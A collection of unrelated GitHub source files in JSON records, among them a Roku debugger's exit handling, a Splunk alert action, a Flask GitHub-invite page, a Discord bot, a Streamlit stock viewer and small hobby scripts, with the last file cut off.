self.__cli\n exitNow = False\n name_to_enum = self.__signal_name_to_enum\n if (signum == name_to_enum[SIGHUP_LITERAL]) or \\\n (signum == name_to_enum[SIGTERM_LITERAL]):\n if cli:\n cli.shutdown_async()\n else:\n exitNow = True\n elif (signum == name_to_enum[SIGINT_LITERAL]) or \\\n (signum == name_to_enum[CTRL_BREAK_EVENT_LITERAL]) or \\\n (signum == name_to_enum[CTRL_C_EVENT_LITERAL]):\n if cli:\n cli.stop_target()\n else:\n exitNow = True\n else:\n if debug_level >= 1:\n print('debug: main: ignoring signal {}'.format(\n signum))\n if exitNow:\n do_exit(1, 'Exiting on signal {}'.format(signum))\n\n def __check_debug(self, min_level):\n lvl = max(global_config.debug_level, self._debug_level)\n if lvl: assert global_config.debug_level >= 0 and self._debug_level >= 0 and min_level >= 1\n return lvl >= min_level\n\n\n# END class RokuDebug\n\nclass _NullOutputController(object):\n\n def __init__(self):\n super().__init__()\n self.localerr = sys.stderr\n self.localout = sys.stdout\n self.targeterr = sys.stderr\n self.targetout = sys.stdout\n\n\n# Always called on main thread (the same thread that invoked main())\ndef _global_signal_handler(signum, frame):\n _rokudebug_main._signal_handler(signum, frame)\n\ndef exit_handler():\n # print('debug: main: exit_handler()',file=sys.__stdout__)\n _rokudebug_main.cleanup()\n\n# Sets the exit code that will be returned by this process to the OS,\n# overriding any value sent to do_exit(). This should only be called\n# when the exit sequence has begun.\n# @return the actual exit_code\ndef set_exit_code(exit_code):\n global _rokudebug_main\n if _rokudebug_main:\n _rokudebug_main.set_exit_code(exit_code)\n else:\n if global_config.debug_level >= 1:\n raise AssertionError(\n 'set_exit_code() called with no RokuDebug instance')\nglobal_config.set_exit_code = set_exit_code # make this available to all modules\n\n# NB: python's SystemExit exception only exits one thread, so it is\n# universally referred to as 'ThreadExit' in this set of scripts.\n#\n# This may be called on any thread and starts the shutdown sequence\n# to exit this process. On the main thread, this throws a ThreadExit\n# (AKA SystemExit) exception. On other threads, it sets the state and\n# returns so the main thread can take care of the shutdown.\n#\n# If a shutdown is already in progress, additional calls to this function\n# on non-main threads are ignored and assumed to be cascading errors (e.g.,\n# I/O errors after sockets have been closed).\n#\n# This deals with Python's goofy exit handling. There appears to be no way\n# for a thread other than main to cleanly exit this process. That's because\n# sys.exit() raises a ThreadExit exception that is ignored, unless it is\n# raised on the thread that called main(). Using os._exit() is not\n# a good idea, because that does not invoke shutdown hooks.\n# @see set_exit_code()\ndef do_exit(exit_code, msg=None) -> None:\n global _rokudebug_main\n exit_code_at_entry = exit_code\n on_main_thread = threading.current_thread() is threading.main_thread()\n if global_config.debug_level >= 2:\n print('debug: do_exit({}) onmainthread:{}'.format(\n exit_code_at_entry, on_main_thread))\n\n # Coordinate exit parameters with other threads\n #\n # If the exit lock cannot be acquired, proceed while unlocked\n # That's scary but we cannot lock up permanently while exiting\n\n condition = _rokudebug_main._exit_cond_var\n locked = condition.acquire(blocking=True, timeout=1)\n try:\n if global_config.debug_level >= 1: # 1 = internal validation\n assert locked\n if _rokudebug_main._exit_now:\n # Shutdown has started\n if global_config.debug_level >= 2 and msg:\n print('debug: ignoring exit msg after shutdown started: {}'.format(msg))\n msg = None # Don't report cascading errors during shutdown\n exit_code = _rokudebug_main._exit_code # exit code was already set\n else:\n # Shutdown has not started (let's start it)\n _rokudebug_main._exit_now = True\n _rokudebug_main._exit_code = exit_code\n\n finally:\n if locked:\n condition.release()\n locked = False\n\n # Print the message, if provided\n\n if global_config.debug_level >= 2:\n # Make output easier to read\n # Don't do this at debug level 1, which is validation only\n sys.stdout.flush()\n sys.stderr.flush()\n if msg:\n out = sys.stdout\n if (exit_code):\n out = sys.stderr\n if not msg.startswith('FATAL'):\n msg = 'FATAL: {}'.format(msg)\n print(msg, file=out)\n\n if on_main_thread:\n # This is the only thread that can actually exit this process\n # raises ThreadExit exception\n sys.exit(exit_code)\nglobal_config.do_exit = do_exit # make this available to all modules\n\ndef is_exiting() -> bool:\n global _rokudebug_main\n\n # If the exit lock cannot be acquired, proceed while unlocked\n # That's scary but we cannot lock up permanently while exiting\n condition = _rokudebug_main._exit_cond_var\n locked = condition.acquire(blocking=True, timeout=1)\n try:\n return _rokudebug_main._exit_now\n finally:\n if locked:\n condition.release()\n locked = False\nglobal_config.get_is_exiting = is_exiting\n","repo_name":"rokudev/remote-debugger","sub_path":"lib/rokudebug/RokuDebug.py","file_name":"RokuDebug.py","file_ext":"py","file_size_in_byte":47619,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"9654639773","text":"import sys\nimport logging\nimport em_constants as EMConstants\nimport json\nimport splunk.rest as rest\nimport em_common as EMCommon\nfrom abc import ABCMeta, abstractmethod\n\n\nclass AbstractCustomAlertAction(object):\n \"\"\"\n Abstract class holds common opetations across alert actions.\n \"\"\"\n __metaclass__ = ABCMeta\n\n def process_payload(self, payload):\n \"\"\"\n Fetches the search results by using the sid from the payload\n \"\"\"\n sid = payload.get('sid')\n search_name = payload.get('search_name')\n session_key = payload.get('session_key')\n\n logging.error('INFO custom alert action em_write_alerts triggered, search_name = %s' % search_name)\n endpoint = EMConstants.SEARCH_RESULTS_ENDPOINT % (EMCommon.get_server_uri(), EMConstants.APP_NAME, sid)\n getargs = {'output_mode': 'json', 'count': 0}\n _, content = rest.simpleRequest(endpoint, session_key, method='GET', getargs=getargs)\n return json.loads(content)\n\n def run(self):\n \"\"\"\n called in the __main__ block of each the alert action.\n \"\"\"\n # logging setup\n sh = logging.StreamHandler()\n log = logging.getLogger()\n log.setLevel(logging.INFO)\n log.addHandler(sh)\n\n # run the script\n if len(sys.argv) > 1 and sys.argv[1] == '--execute':\n try:\n payload = json.loads(sys.stdin.read())\n self.execute_action(payload)\n except Exception as e:\n logging.error(e)\n sys.exit(3)\n else:\n logging.error('FATAL Unsupported execution mode (expected --execute flag)')\n sys.exit(1)\n\n def execute_action(self, payload):\n \"\"\"\n Processes the payload and calls the alert specific execute function to perform actions\n on the search results\n \"\"\"\n content = self.process_payload(payload)\n results = content['results']\n self.execute(results, payload)\n\n @abstractmethod\n def execute(self, result, payload):\n \"\"\"\n All child class should override this method to perform custom actions on the results\n \"\"\"\n raise NotImplemented(\"Abstract method not implemented\")\n","repo_name":"jljfoto/SplunkEtc","sub_path":"apps/splunk_app_infrastructure/bin/em_abstract_custom_alert_action.py","file_name":"em_abstract_custom_alert_action.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14328971983","text":"import logging\n\nfrom flask import Blueprint, current_app, redirect, render_template, request, session\n\nfrom landing_page_app.main.middleware.auth import requires_auth\nfrom landing_page_app.main.scripts.join_github_form_auth0_user import (\n JoinGithubFormAuth0User,\n)\n\nlogger = logging.getLogger(__name__)\n\nAUTHLIB_CLIENT = \"authlib.integrations.flask_client\"\n\nmain = Blueprint(\"main\", __name__)\n\n\n@main.route(\"/\")\ndef index():\n return render_template(\"pages/home.html\")\n\n\n@main.route(\"/join-github\")\ndef join_github_info_page():\n return render_template(\"pages/join-github.html\")\n\n\n@main.route(\"/thank-you\")\ndef thank_you():\n return render_template(\"pages/thank-you.html\")\n\n\ndef error(error_message):\n logger.error(error_message)\n return render_template(\n \"pages/errors/internal-error.html\", error_message=error_message\n )\n\n\ndef _join_github_auth0_users(request):\n form = JoinGithubFormAuth0User(request.form)\n if request.method == \"POST\" and form.validate() and form.validate_org():\n selected_orgs = current_app.github_script.get_selected_organisations(\n form.access_moj_org.data, form.access_as_org.data\n )\n\n if current_app.github_script.is_github_seat_protection_enabled() is True:\n return error(\"GitHub Seat protection enabled\")\n\n username = form.gh_username.data\n if len(username) > 0:\n if current_app.github_script.validate_user_rejoining_org(\n selected_orgs, username\n ):\n current_app.github_script.add_returning_user_to_github_org(\n username, selected_orgs\n )\n else:\n return error(\n \"Username not found or has expired. Create a new request and leave the username box empty.\"\n )\n else:\n user_email = session[\"user\"][\"userinfo\"][\"email\"]\n current_app.github_script.add_new_user_to_github_org(\n user_email, selected_orgs\n )\n\n return redirect(\"thank-you\")\n\n # Problem in the form\n return render_template(\n \"pages/join-github-auth0-user.html\",\n form=form,\n template=\"join-github-auth0-user.html\",\n )\n\n\n@main.route(\"/join-github-auth0-user\", methods=[\"GET\", \"POST\"])\n@requires_auth\ndef join_github_auth0_users():\n return _join_github_auth0_users(request)\n","repo_name":"ministryofjustice/operations-engineering-landing-page-poc","sub_path":"landing_page_app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71626258373","text":"import asyncio\n\nimport discord\nfrom discord.ext import commands, tasks\n\nimport os\nimport typing\n\n\nasync def _get_cog_file_dirs(base_dir: str, return_list: typing.Optional[typing.List[str]] = []) -> typing.List[str]:\n for filename in os.listdir(base_dir):\n if os.path.isdir(f\"{base_dir}/{filename}\"):\n await _get_cog_file_dirs(f\"{base_dir}/{filename}\", return_list=return_list)\n elif filename.endswith(\".py\"):\n return_list.append(f\"{base_dir}/{filename}\")\n return return_list\n\n\nasync def _change_filepath_to_python_path(path: str) -> str:\n return \".\".join(os.path.normpath(path).split(os.sep))[:-3]\n\n\nclass Nubot(commands.Bot):\n\n def __init__(self) -> None:\n super().__init__(intents=discord.Intents.all(), command_prefix=\"0\", help_command=None)\n self.__COG_DIR_NAME: str = \"scripts/cogs\"\n self.__COG_DIR: str = \"scripts.cogs\"\n\n async def add_cogs(self) -> None:\n cog_paths: typing.List[str] = await _get_cog_file_dirs(\"scripts/cogs\")\n\n for i in range(len(cog_paths)):\n cog_paths[i] = await _change_filepath_to_python_path(cog_paths[i])\n\n for cog in cog_paths:\n print(f\"-> Loading cog: `{cog}`\", end=\" \")\n await self.load_extension(cog)\n print(\"Finished\")\n\n async def setup_hook(self) -> None:\n print(\"Starting setup_hook...\")\n await self.add_cogs()\n print(\"-> Starting snake...\", end=\" \")\n self.get_cog(\"Snake\").move.start()\n print(\"Finished\")\n self.sync_commands.start()\n print(\"Finished setup_hook\")\n\n @tasks.loop(minutes=1.0, count=1)\n async def sync_commands(self) -> None:\n print(\"Starting syncing task...\")\n print(\"-> Waiting for the bot to log in...\")\n await self.wait_until_ready()\n guild: discord.Guild\n for guild in self.guilds:\n print(f\"-> Syncing application commands for guild with ID: {guild.id}\", end=\" \")\n self.tree.copy_global_to(guild=guild)\n print(\"Finished\")\n await self.tree.sync()\n print(\"Finished syncing task\")\n","repo_name":"ciufcia/Nubot","sub_path":"scripts/nubot.py","file_name":"nubot.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"16346706106","text":"import sys\n\nimport gi\n\ngi.require_version(\"Gtk\", \"3.0\")\nfrom gi.repository import Gtk, Gio\n\nclass App(Gtk.Application):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, application_id=\"com.shellfox.seettings\", **kwargs)\n self.window = None\n\n def do_activate(self):\n if not self.window:\n builder = Gtk.Builder()\n builder.add_from_file('./app.ui')\n self.window = builder.get_object(\"main\")\n self.add_window(self.window)\n\n self.window.show_all()\n\n\nif __name__ == '__main__':\n app = App()\n app.run(sys.argv)\n","repo_name":"naoufalzerai/Dashboard-gtk","sub_path":"header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"70757652934","text":"import os\nimport random\n\nimport numpy\nimport torch\n\nfrom config import LOGS_ROOT\nfrom utilities import *\n\n\ndef main(args):\n # Reproducibility\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n numpy.random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n \n # Get Model and Dataset\n model = get_model(args)\n train_loader, valid_loader, test_loader = get_dataloaders(args)\n \n torch.save(model.state_dict(), os.path.join(LOGS_ROOT, args.dataset, args.name, \"models\", \"init.pt\"))\n \n # Optimizers\n pytorch_optmizer, sensitivity_optmizer = get_optimizers(args, model)\n \n # SummaryWriter\n tb_writer = get_tb_writer(args)\n \n # Train the model\n if args.batch_pruning:\n train_model_batch_pruning(args, model, train_loader, valid_loader, test_loader, pytorch_optmizer,\n sensitivity_optmizer, tb_writer)\n else:\n train_model_epoch_pruning(args, model, train_loader, valid_loader, test_loader, pytorch_optmizer,\n sensitivity_optmizer, tb_writer)\n \n torch.save(model.state_dict(), os.path.join(LOGS_ROOT, args.dataset, args.name, \"models\", \"end.pt\"))\n\n\nif __name__ == '__main__':\n # Parse arguments\n args = parse_args()\n \n main(args)\n","repo_name":"EIDOSLAB/LOBSTER","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"43747766853","text":"from PIL import Image, ImageDraw, ImageOps,ImageFilter\nfrom skimage.measure import label, regionprops\nfrom skimage.morphology import closing, square\nfrom skimage.color import label2rgb\nfrom numpy import array\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\ndef mask(low, high):\n\treturn [255 if low <= x <= high else 0 for x in range(0, 256)]\n\nUMBRAL = [(0,30), (0,30), (0,30)]\nclass Semillero(object):\n\tdef __init__(self, archivo):\n\t\tself.archivo = archivo\n\t\tself.img = Image.open(archivo)\n\t\tsize = self.img.size\n\t\t# print(self.img.size)\n\t\ttam = 1600\n\t\tself.img = self.img.resize((tam, int(size[1] * tam / size[0]))) if size[0] > size[1] else self.img.resize((int(size[0] * tam / size[1]),tam))\n\t\t# self.img = self.img.filter(ImageFilter.UnsharpMask(6,80))\n\t\t# self.img = self.img.filter(ImageFilter.GaussianBlur())\n\t\t# self.img = self.img.filter(ImageFilter.UnsharpMask(4))\n\t\ttamfilter = 3\n\t\tself.img = self.img.filter(ImageFilter.RankFilter(tamfilter, int(tamfilter*tamfilter/2)))\n\t\t# self.img = ImageOps.equalize(self.img)\n\t\t# self.img = ImageOps.autocontrast(self.img)\n\t\t# print(self.img.size)\n\t\tself.regiones = []\n\tdef BuscarRegiones(self):\n\t\tmask_R = mask(UMBRAL[0][0], UMBRAL[0][1])\n\t\tmask_G = mask(UMBRAL[1][0], UMBRAL[1][1])\n\t\tmask_B = mask(UMBRAL[2][0], UMBRAL[2][1])\n\t\tself.img_binary = self.img.point(mask_R+mask_G+mask_B).convert('L').point([0]*255+[255])\n\t\tself.img_binary.save(\"binario.jpg\")\n\t\tself.img_binary = self.img_binary.filter(ImageFilter.MaxFilter(5))\n\t\tself.img_binary = self.img_binary.filter(ImageFilter.MinFilter(5))\n\t\tself.img_binary.save(\"binario2.jpg\")\n\t\tarr_binary = array(self.img_binary)\n\t\tarr_closed = closing(arr_binary)\n\t\tarr_labeled = label(arr_closed)\n\t\tself.regiones = regionprops(arr_labeled)\n\tdef PromedioArea(self):\n\t\t# print(\"Calculando\")\n\t\tself.prom = -1\n\t\tself.std = -1\n\t\tvalores = []\n\t\twhile self.std > self.prom * .5 or self.std == -1:\n\t\t\tvalores = []\n\t\t\tfor region in self.regiones:\n\t\t\t\tif (region.area > self.prom + self.std or region.area < self.prom - self.std) and self.prom != -1 and self.std != -1:\n\t\t\t\t\tcontinue\n\t\t\t\tvalores.append(region.area)\n\t\t\tself.prom = np.mean(valores)\n\t\t\tself.std = np.std(valores)\n\t\tself.minimo = min(valores)\n\t\t\t# print(\"Promedio\", self.prom,\"std\",self.std, valores)\n\tdef Validas(self):\n\t\treturn [ region for region in self.regiones if region.area < self.prom + self.std and region.area > self.prom - self.std ]\n\tdef Procesar(self):\n\t\t# print(\"Procesando\")\n\t\tself.BuscarRegiones()\n\t\tself.PromedioArea()\n\t\tvalidas = self.Validas()\n\t\tprint(\"Cantidad validas\", len(validas))\n\t\tfig, ax = plt.subplots()\n\t\tfor p in [\n\t\t [patches.Rectangle(\n\t\t (r.bbox[1], r.bbox[0]),\n\t\t r.bbox[3] - r.bbox[1],\n\t\t r.bbox[2] - r.bbox[0],\n\t\t fill=False,\n\t\t edgecolor='blue',\n\t\t alpha=.4\n\t\t ), r.centroid] for r in validas]: \n\t\t ax.add_patch(p[0])\n\t\t # plt.plot(p[1][1], p[1][0], 'bo')\n\t\tresto = [region for region in self.regiones if region not in validas and region.area > self.minimo - self.std]\n\t\tprint(\"restos posibles\", len(resto))\n\t\tfor p in [\n\t\t\t[patches.Rectangle(\n\t\t (r.bbox[1], r.bbox[0]),\n\t\t r.bbox[3] - r.bbox[1],\n\t\t r.bbox[2] - r.bbox[0],\n\t\t fill=False,\n\t\t edgecolor='red',\n\t\t alpha=.4\n\t\t ), r.centroid, r.image] for r in resto]:\n\t\t ax.add_patch(p[0])\n\t\t # plt.plot(p[1][1], p[1][0], 'ro')\t\n\t\tplt.imshow(self.img)\n\t\tplt.show()\nSemillero(\"imagen/IMG_20180118_090124.jpg\").Procesar()\n# Semillero(\"imagen/50.jpg\").Procesar()\n","repo_name":"Francuchin/semillero","sub_path":"trash/conteo.py","file_name":"conteo.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38258964505","text":"from typing import List\n\nfrom .base import UPipeEntity\n\n\nclass ResourceType:\n NODE = 'node'\n CPU = 'cpu'\n GPU = 'gpu'\n TPU = 'tpu'\n MEMORY = 'memory'\n NETWORK_IO = 'network_io'\n DISK_IO = 'disk_io'\n STANDARD_STORAGE = 'standard_storage'\n SSD_STORAGE = 'ssd_storage'\n\n\nclass APINodeResource(UPipeEntity):\n type: str # ResourceType\n id: str\n name: str\n size: float = -1\n\n\nclass APINode(UPipeEntity):\n controller: bool\n controller_host: str = None\n controller_port: int = None\n resources: List[APINodeResource] = []\n","repo_name":"dataloop-ai/dtlpy-upipe","sub_path":"dataloop/upipe/types/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"11560141535","text":"from src.composition import Composition\nfrom src.liquid_chemistry import LiquidActivity\nfrom src.gas_chemistry import GasPressure\nfrom src.thermosystem import EquilibriumThermoSystem\nfrom src.report import Report\nfrom src.plots import collect_data, make_figure\n\nfrom random import uniform\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport labellines\n\n\"\"\"\nThis script shows how to run MAGMApy given a temperature path path.\n\"\"\"\n\nmax_temperature = 4200 # K\nmin_temperature = 1800 # K\ntemperature_increment = 200 # K\ntitle = \"MAG18\"\n\n# BSE composition, Visccher & Fegley 2013\ncomposition = {\n \"SiO2\": 45.40,\n 'MgO': 36.76,\n 'Al2O3': 4.48,\n 'TiO2': 0.21,\n 'Fe2O3': 0.00000,\n 'FeO': 8.10,\n 'CaO': 3.65,\n 'Na2O': 0.349,\n 'K2O': 0.031,\n 'ZnO': 6.7e-3,\n}\n\nmajor_gas_species = [\n \"SiO\", \"O2\", \"MgO\", \"Fe\", \"Ca\", \"Al\", \"Ti\", \"Na\", \"K\", \"Zn\"\n]\n\nc = Composition(\n composition=composition\n)\n\ng = GasPressure(\n composition=c,\n major_gas_species=major_gas_species,\n minor_gas_species=\"__all__\",\n)\n\nl = LiquidActivity(\n composition=c,\n complex_species=\"__all__\",\n gas_system=g\n)\n\nt = EquilibriumThermoSystem(composition=c, gas_system=g, liquid_system=l)\n\nreports = Report(composition=c, liquid_system=l, gas_system=g, thermosystem=t)\n\ncount = 1\nfor temperature in reversed(\n np.arange(min_temperature, max_temperature + temperature_increment, temperature_increment)):\n l.calculate_activities(temperature=temperature)\n g.calculate_pressures(temperature=temperature, liquid_system=l)\n if l.counter == 1:\n l.calculate_activities(temperature=temperature)\n g.calculate_pressures(temperature=temperature, liquid_system=l)\n t.vaporize()\n l.counter = 0 # reset Fe2O3 counter for next vaporization step\n print(\"[~] At iteration: {} (Weight Fraction Vaporized: {} %) (temperature: {} K)\".format(count,\n t.weight_fraction_vaporized * 100.0,\n temperature))\n # if count % 5 == 0 or count == 1:\n reports.create_composition_report(iteration=count)\n reports.create_liquid_report(iteration=count)\n reports.create_gas_report(iteration=count)\n count += 1\n\n\ndef get_annotation_location(species, x_data, y_data, target_x):\n if species == \"MgO\":\n target_x = 0.70\n elif species == \"Na\":\n target_x = 0.22\n min_diff = 10 * 10 ** 10\n x = None\n y = None\n for index, i in enumerate(x_data):\n diff = abs(i - target_x)\n if diff < min_diff:\n min_diff = diff\n x = i\n y = y_data[index] + .001\n return x, y\n\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.set_xlabel(\"Temperature (K)\")\nax.set_ylabel(\"Partial Pressure\")\nax.set_title(f\"Vapor Composition - {title}\")\n# ax.set_ylim(-3, 0)\ndata = collect_data(path=\"reports/partial_pressures\", x_header='temperature (K)')\n# get a unique color for each species\ncolors = plt.cm.jet(np.linspace(0, 1, len(data[list(data.keys())[0]])))\nfor index, i in enumerate(data[list(data.keys())[0]]):\n if \"_l\" not in i:\n linewidth = 1.0\n label = i.split(\"_\")[0]\n color = colors[index]\n if \"K\" in i:\n linewidth = 2.0\n label = fr'$\\bf{label}$'\n color = 'red'\n x_data = [j for j in data.keys()]\n y_data = []\n tmp = [data[j][i] for j in data.keys()]\n for j in tmp:\n if j > 0:\n # y_data.append(log10(j))\n y_data.append(j)\n else:\n y_data.append(np.nan)\n ax.plot(\n x_data,\n y_data,\n linewidth=linewidth,\n color=color,\n label=label\n )\n # ax.annotate(i, get_annotation_location(species=i, x_data=x_data, y_data=y_data, target_x=1850))\n# plot the total pressure\nax.plot(\n data.keys(),\n [sum([j for key, j in i.items() if \"_l\" not in key]) for i in data.values()],\n linewidth=1.0,\n color='k',\n label=\"Total\"\n)\n\nlabellines.labelLines(ax.get_lines(), zorder=2.5, align=True,\n xvals=[uniform(3000, max_temperature) for i in ax.get_lines()], fontsize=8)\nax.set_xlim(min_temperature, max_temperature)\nax.set_ylim(10 ** -6, 100)\nax.grid()\nax.set_yscale('log')\nax.yaxis.tick_right()\nplt.tight_layout()\nplt.show()\n","repo_name":"ScottHull/MAGMApy","sub_path":"test_equilibrium.py","file_name":"test_equilibrium.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28237582021","text":"import yfinance as yf\nimport pandas as pd\nimport altair as alt\nimport streamlit as st \n\nst.title('あっきーの米国株')\n\nst.sidebar.write(\"\"\"\n# あっきー厳選米国株\nこちらは株価可視化ツールです。以下のオプションから表示日数を選んでください\n\"\"\")\nst.sidebar.write(\"\"\"\n## 表示日数選択\n\"\"\")\ndays= st.sidebar.slider(\"日数\",1,200,50)\n#min:1, max:200, default:50\n\nst.write(f\"\"\"\n過去 **{days}日間** のあっきー保有銘柄の株価\n\"\"\")\n\n@st.cache\ndef get_data(days, TS):\n df =pd.DataFrame()\n for comp in TS.keys():\n tkr = yf.Ticker(TS[comp])\n hist = tkr.history(period=f'{days}d')\n hist.index = hist.index.strftime('%d %B %Y')\n hist=hist[['Close']]\n hist.columns=[comp]\n hist=hist.T\n hist.index.name='company'\n df = pd.concat([df,hist])\n return df\n\n\n\ntry:\n st.sidebar.write(\"\"\"\n ## 株価の範囲を指定してください(USD) \n \"\"\")\n ymin, ymax =st.sidebar.slider('範囲',0,800,(0,500))\n #デフォルトの最小を0, 最大を500に設定\n\n TS={\n 'APPLE':'AAPL',\n 'VTI (ETF)':'VTI',\n 'UNITY SOFTWARE':'U',\n 'C3 AI':'AI',\n 'ZOOM':'ZM',\n 'ZOOMINFO':'ZI',\n 'ROYALITY PHARMA':'RPRX',\n 'PINTEREST':'PINS',\n 'DELTA AIR LINES':'DAL', \n }\n\n df=get_data(days, TS)\n\n companies= st.multiselect(\n '会社名を選択してください',\n list(df.index),\n ['VTI (ETF)','ZOOM','APPLE']\n )\n\n if not companies:\n st.error('少なくとも一社は選んでください')\n else:\n data=df.loc[companies]\n st.write(\"### 株価(USD)\",data.sort_index())\n data= data.T.reset_index()\n data=pd.melt(data,id_vars=['Date'])\n data= data.rename(columns={'value':'Stock prices(USD)'})\n chart=(\n alt.Chart(data)\n .mark_line(opacity=0.8, clip =True)\n .encode(\n x=\"Date:T\",\n y=alt.Y(\"Stock prices(USD):Q\", stack=None, scale=alt.Scale(domain=[ymin,ymax])),\n color='company:N'\n )\n )\n st.altair_chart(chart, use_container_width=True)\nexcept:\n st.error(\"何かエラーが起きたようです!\")\n","repo_name":"Akkey2021/streamlit1","sub_path":"kabuka.py","file_name":"kabuka.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9474646321","text":"N, S = map(int, input().split())\n\nnum_list = list(map(int, input().split()))\n\nanswer = 0\n\n\ndef dfs(temp_sum, now_idx):\n global answer\n if temp_sum == S:\n answer += 1\n if now_idx == N - 1:\n return\n\n for next_idx in range(now_idx + 1, N):\n dfs(temp_sum + num_list[next_idx], next_idx)\n\n\nfor idx in range(N):\n dfs(num_list[idx], idx)\n\nprint(answer)\n","repo_name":"Challenge-Next-Level/Floyd-Warshall","sub_path":"LeeYooseok/BOJ_오늘의 문제/2023-03-25/1182 부분수열의 합.py","file_name":"1182 부분수열의 합.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"19567305919","text":"# Celsius to Fahrenheit and vice versa\r\nimport operator\r\n\r\ndef c_to_f(the_temp):\r\n the_temp *= 9/5\r\n the_temp += 32\r\n return the_temp\r\n \r\ndef f_to_c(the_temp):\r\n the_temp -= 32\r\n the_temp *= 5/9\r\n return the_temp\r\n\r\ndef k_to_c_back(temp, the_op):\r\n ans = the_op(temp, 273.15)\r\n return ans\r\n \r\ndef k_to_f(temp): \r\n temp_in_f = 9/5 * (temp - 273) + 32\r\n return temp_in_f\r\n \r\nfinish = False \r\nprint (\"This is the Temperature Converter!\")\r\n\r\nwhile finish == False:\r\n print ()\r\n to_convert = input(\"Enter what type of temperature you want to convert ('c' for celsius, 'f' for fahrenheit and 'k' for kelvin): \").lower()\r\n to_make = input(\"Enter what you want to convert the above type to: \").lower() \r\n if to_convert == to_make:\r\n print (\"You entered the same thing. Please try again.\")\r\n continue\r\n \r\n temp_to_change = input(\"Enter the temperature you wish to convert, or press ENTER to exit: \")\r\n if temp_to_change == \"\":\r\n print (\"\\nGame Over!\")\r\n finish = True\r\n \r\n else:\r\n try:\r\n val = float(temp_to_change)\r\n except ValueError:\r\n print (\"\\nPlease enter a number only.\") \r\n continue\r\n \r\n print () \r\n if (to_convert == \"k\" or to_convert == \"kelvin\") and (to_make == \"f\" or to_make == \"fahrenheit\"):\r\n print (str(temp_to_change) + \" Kelvin converts to \" + str(c_to_f(k_to_c_back(float(temp_to_change), operator.sub))) + \"°F.\")\r\n \r\n elif (to_convert == \"k\" or to_convert == \"kelvin\") and (to_make == \"c\" or to_make == \"celsius\"):\r\n print (str(temp_to_change) + \" Kelvin converts to \" + str(k_to_c_back(float(temp_to_change), operator.sub)) + \"°C.\")\r\n \r\n elif (to_convert == \"f\" or to_convert == \"fahrenheit\") and (to_make == \"k\" or to_make == \"kelvin\"):\r\n print (str(temp_to_change) + \"°F converts to \" + str(k_to_c_back(f_to_c(float(temp_to_change)), operator.add)) + \" Kelvin.\")\r\n \r\n elif (to_convert == \"f\" or to_convert == \"fahrenheit\") and (to_make == \"c\" or to_make == \"celsius\"):\r\n print (str(temp_to_change) + \"°F converts to \" + str(f_to_c(float(temp_to_change))) + \"°C.\")\r\n \r\n elif (to_convert == \"c\" or to_convert == \"celsius\") and (to_make == \"k\" or to_make == \"kelvin\"):\r\n print (str(temp_to_change) + \"°C converts to \" + str(k_to_c_back(float(temp_to_change), operator.add)) + \" Kelvin.\")\r\n \r\n elif (to_convert == \"c\" or to_convert == \"celsius\") and (to_make == \"f\" or to_make == \"fahrenheit\"):\r\n print (str(temp_to_change) + \"°C converts to \" + str(c_to_f(float(temp_to_change))) + \"°F.\") \r\n \r\n else:\r\n print (\"I can't understand what you entered. Please try again.\") ","repo_name":"tanmay2004/Math-Programs","sub_path":"The Temperature Converter.py","file_name":"The Temperature Converter.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31400083297","text":"\"\"\"\r\nЗадание:\r\nНайти подходящие данные для подобной задачи\r\n\r\n1. Загрузить их в pandas.\r\n2. Шкалировать для совместимости с ИНС.\r\n3. Сравнить результат \"до\" и \"после\".\r\n---------------------------------------------------------\r\nДанные содержатся в файле data.xlsx\r\nДанные составлены вручную с сайта https://perm.vseinstrumenti.ru/\r\nТема: электрические энергосберегающие лампы\r\n\r\nТаблица содержит следующие колонки:\r\n- № поз.\r\n- Наименование\r\n- Производитель\r\n- Мощность, Вт\r\n- Световой поток, Лм\r\n- Длина, мм\r\n- Диаметр, мм\r\n- Цветопередача, Ra\r\n- Срок службы, ч\r\n- Цветовая температура, К\r\n- Стоимость единицы, руб.\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import preprocessing\r\n\r\ndata = pd.ExcelFile(\"data.xlsx\")\r\ndata_parse = data.parse('Лист1')\r\ndata_frame = pd.DataFrame(data_parse)\r\n\r\n\"\"\"\r\nОбучающий вектор примем колонку \"Мощность, Вт\"\r\nВ качестве данных:\r\n- Световой поток, 